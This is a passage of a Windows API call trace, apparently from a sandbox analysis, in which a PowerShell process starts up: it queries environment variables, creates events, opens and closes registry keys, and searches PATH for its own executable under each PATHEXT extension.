	[0398.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.136] CoTaskMemFree (pv=0x1b771250) 
	[0398.139] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.139] CoTaskMemFree (pv=0x1b771250) 
	[0398.142] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.142] CoTaskMemFree (pv=0x1b771250) 
	[0398.522] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.522] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.522] CoTaskMemFree (pv=0x1b771250) 
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x344
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x304
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x30c
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
	[0398.524] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0398.525] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8
	[0398.525] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d0
	[0398.527] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.527] CoTaskMemFree (pv=0x1b771250) 
	[0398.530] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0398.530] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24d7e0 | out: lpMode=0x24d7e0) returned 1
	[0398.532] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.532] CoTaskMemFree (pv=0x1b771250) 
	[0398.536] SetEvent (hEvent=0x330) returned 1
	[0398.536] SetEvent (hEvent=0x340) returned 1
	[0398.536] SetEvent (hEvent=0x344) returned 1
	[0398.536] SetEvent (hEvent=0x348) returned 1
	[0398.536] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0398.538] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.539] CoTaskMemFree (pv=0x1b771250) 
	[0398.539] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d538 | out: phkResult=0x24d538*=0x354) returned 0x0
	[0398.539] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d4bc, lpData=0x0, lpcbData=0x24d4b8*=0x0 | out: lpType=0x24d4bc*=0x0, lpData=0x0, lpcbData=0x24d4b8*=0x0) returned 0x2

Thread:
	id = 204
	os_tid = 0x30c


Thread:
	id = 215
	os_tid = 0xc38


Thread:
	id = 373
	os_tid = 0x408


Thread:
	id = 395
	os_tid = 0x1018


Thread:
	id = 398
	os_tid = 0x1024

	[0361.722] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0376.945] LocalFree (hMem=0xc7290) returned 0x0
	[0376.945] CloseHandle (hObject=0x320) returned 1
	[0376.946] CloseHandle (hObject=0x13) returned 1
	[0376.946] CloseHandle (hObject=0xf) returned 1
	[0376.947] RegCloseKey (hKey=0x30c) returned 0x0
	[0376.947] RegCloseKey (hKey=0x308) returned 0x0
	[0376.947] RegCloseKey (hKey=0x304) returned 0x0
	[0376.947] LocalFree (hMem=0xc7260) returned 0x0
	[0376.947] RegCloseKey (hKey=0x330) returned 0x0
	[0381.731] RegCloseKey (hKey=0x330) returned 0x0
	[0387.419] RegCloseKey (hKey=0x334) returned 0x0
	[0387.419] RegCloseKey (hKey=0x320) returned 0x0
	[0387.419] RegCloseKey (hKey=0x30c) returned 0x0
	[0387.419] RegCloseKey (hKey=0x304) returned 0x0
	[0387.420] RegCloseKey (hKey=0x330) returned 0x0
	[0387.420] RegCloseKey (hKey=0x348) returned 0x0
	[0387.420] RegCloseKey (hKey=0x344) returned 0x0
	[0387.420] RegCloseKey (hKey=0x340) returned 0x0
	[0387.420] RegCloseKey (hKey=0x33c) returned 0x0
	[0387.421] RegCloseKey (hKey=0x338) returned 0x0
	[0394.661] RegCloseKey (hKey=0x374) returned 0x0
	[0394.661] RegCloseKey (hKey=0x370) returned 0x0
	[0394.661] RegCloseKey (hKey=0x36c) returned 0x0
	[0394.661] RegCloseKey (hKey=0x368) returned 0x0
	[0394.662] RegCloseKey (hKey=0x334) returned 0x0
	[0394.662] RegCloseKey (hKey=0x380) returned 0x0
	[0394.662] RegCloseKey (hKey=0x360) returned 0x0
	[0394.662] RegCloseKey (hKey=0x35c) returned 0x0
	[0394.662] RegCloseKey (hKey=0x358) returned 0x0
	[0394.663] RegCloseKey (hKey=0x354) returned 0x0
	[0394.663] RegCloseKey (hKey=0x1cc) returned 0x0
	[0394.663] RegCloseKey (hKey=0x1d0) returned 0x0
	[0394.663] RegCloseKey (hKey=0x1c8) returned 0x0
	[0394.663] RegCloseKey (hKey=0x338) returned 0x0
	[0394.663] RegCloseKey (hKey=0x37c) returned 0x0
	[0394.664] RegCloseKey (hKey=0x378) returned 0x0
	[0394.664] RegCloseKey (hKey=0x320) returned 0x0
	[0394.664] RegCloseKey (hKey=0x30c) returned 0x0
	[0394.664] RegCloseKey (hKey=0x304) returned 0x0
	[0394.664] RegCloseKey (hKey=0x330) returned 0x0
	[0394.665] RegCloseKey (hKey=0x348) returned 0x0
	[0394.665] RegCloseKey (hKey=0x344) returned 0x0
	[0394.665] RegCloseKey (hKey=0x340) returned 0x0
	[0394.665] RegCloseKey (hKey=0x33c) returned 0x0
	[0641.472] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 576
	os_tid = 0x4a0

	[0398.918] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0398.922] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0398.927] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.927] CoTaskMemFree (pv=0x1b771250) 
	[0398.929] VirtualQuery (in: lpAddress=0x1c7adb60, lpBuffer=0x1c7aea20, dwLength=0x30 | out: lpBuffer=0x1c7aea20*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.932] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.932] CoTaskMemFree (pv=0x1b771250) 
	[0398.934] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.934] CoTaskMemFree (pv=0x1b771250) 
	[0398.937] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.937] CoTaskMemFree (pv=0x1b771250) 
	[0398.947] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.947] CoTaskMemFree (pv=0x1b771250) 
	[0398.949] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.949] CoTaskMemFree (pv=0x1b771250) 
	[0398.951] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.951] CoTaskMemFree (pv=0x1b771250) 
	[0398.955] VirtualQuery (in: lpAddress=0x1c7ade10, lpBuffer=0x1c7aecd0, dwLength=0x30 | out: lpBuffer=0x1c7aecd0*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0398.956] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0398.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0398.956] CoTaskMemFree (pv=0x1b771250) 
	[0399.318] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.318] CoTaskMemFree (pv=0x1b771250) 
	[0399.319] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.319] CoTaskMemFree (pv=0x1b771250) 
	[0399.320] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.320] CoTaskMemFree (pv=0x1b771250) 
	[0399.325] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.325] CoTaskMemFree (pv=0x1b771250) 
	[0399.679] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.679] CoTaskMemFree (pv=0x1b771250) 
	[0399.681] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.681] CoTaskMemFree (pv=0x1b771250) 
	[0399.682] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.682] CoTaskMemFree (pv=0x1b771250) 
	[0399.685] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.685] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.685] CoTaskMemFree (pv=0x1b771250) 
	[0399.686] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.687] CoTaskMemFree (pv=0x1b771250) 
	[0399.688] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.688] CoTaskMemFree (pv=0x1b771250) 
	[0399.690] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.690] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.690] CoTaskMemFree (pv=0x1b771250) 
	[0399.705] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0399.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0399.705] CoTaskMemFree (pv=0x1b771250) 
	[0400.234] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0400.234] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0400.235] CoTaskMemFree (pv=0x1b771250) 
	[0400.691] CoTaskMemAlloc (cb=0x104) returned 0x1b771250
	[0400.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b771250, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0400.691] CoTaskMemFree (pv=0x1b771250) 
	[0400.691] CoTaskMemAlloc (cb=0x128) returned 0x12fae0
	[0400.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12fae0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0400.691] CoTaskMemFree (pv=0x12fae0) 
	[0400.696] CoTaskMemAlloc (cb=0x20e) returned 0x1b765740
	[0400.696] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b765740 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0400.696] CoTaskMemFree (pv=0x1b765740) 
	[0400.700] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0400.701] SetErrorMode (uMode=0x1) returned 0x1
	[0400.704] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0400.715] SetErrorMode (uMode=0x1) returned 0x1
	[0400.716] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0400.717] SetErrorMode (uMode=0x1) returned 0x1
	[0400.717] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0400.725] SetErrorMode (uMode=0x1) returned 0x1
	[0400.726] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0400.726] SetErrorMode (uMode=0x1) returned 0x1
	[0400.726] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0400.735] SetErrorMode (uMode=0x1) returned 0x1
	[0400.736] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0400.736] SetErrorMode (uMode=0x1) returned 0x1
	[0400.736] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.117] SetErrorMode (uMode=0x1) returned 0x1
	[0401.118] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.118] SetErrorMode (uMode=0x1) returned 0x1
	[0401.118] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.127] SetErrorMode (uMode=0x1) returned 0x1
	[0401.128] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.129] SetErrorMode (uMode=0x1) returned 0x1
	[0401.129] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.137] SetErrorMode (uMode=0x1) returned 0x1
	[0401.138] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.138] SetErrorMode (uMode=0x1) returned 0x1
	[0401.138] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.146] SetErrorMode (uMode=0x1) returned 0x1
	[0401.147] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.147] SetErrorMode (uMode=0x1) returned 0x1
	[0401.148] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.156] SetErrorMode (uMode=0x1) returned 0x1
	[0401.555] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.555] SetErrorMode (uMode=0x1) returned 0x1
	[0401.556] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.564] SetErrorMode (uMode=0x1) returned 0x1
	[0401.565] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.565] SetErrorMode (uMode=0x1) returned 0x1
	[0401.565] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.572] SetErrorMode (uMode=0x1) returned 0x1
	[0401.573] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.573] SetErrorMode (uMode=0x1) returned 0x1
	[0401.573] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.579] SetErrorMode (uMode=0x1) returned 0x1
	[0401.581] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.581] SetErrorMode (uMode=0x1) returned 0x1
	[0401.581] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7add40 | out: lpFindFileData=0x1c7add40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0401.587] SetErrorMode (uMode=0x1) returned 0x1
	[0401.588] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7adba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0401.589] SetErrorMode (uMode=0x1) returned 0x1
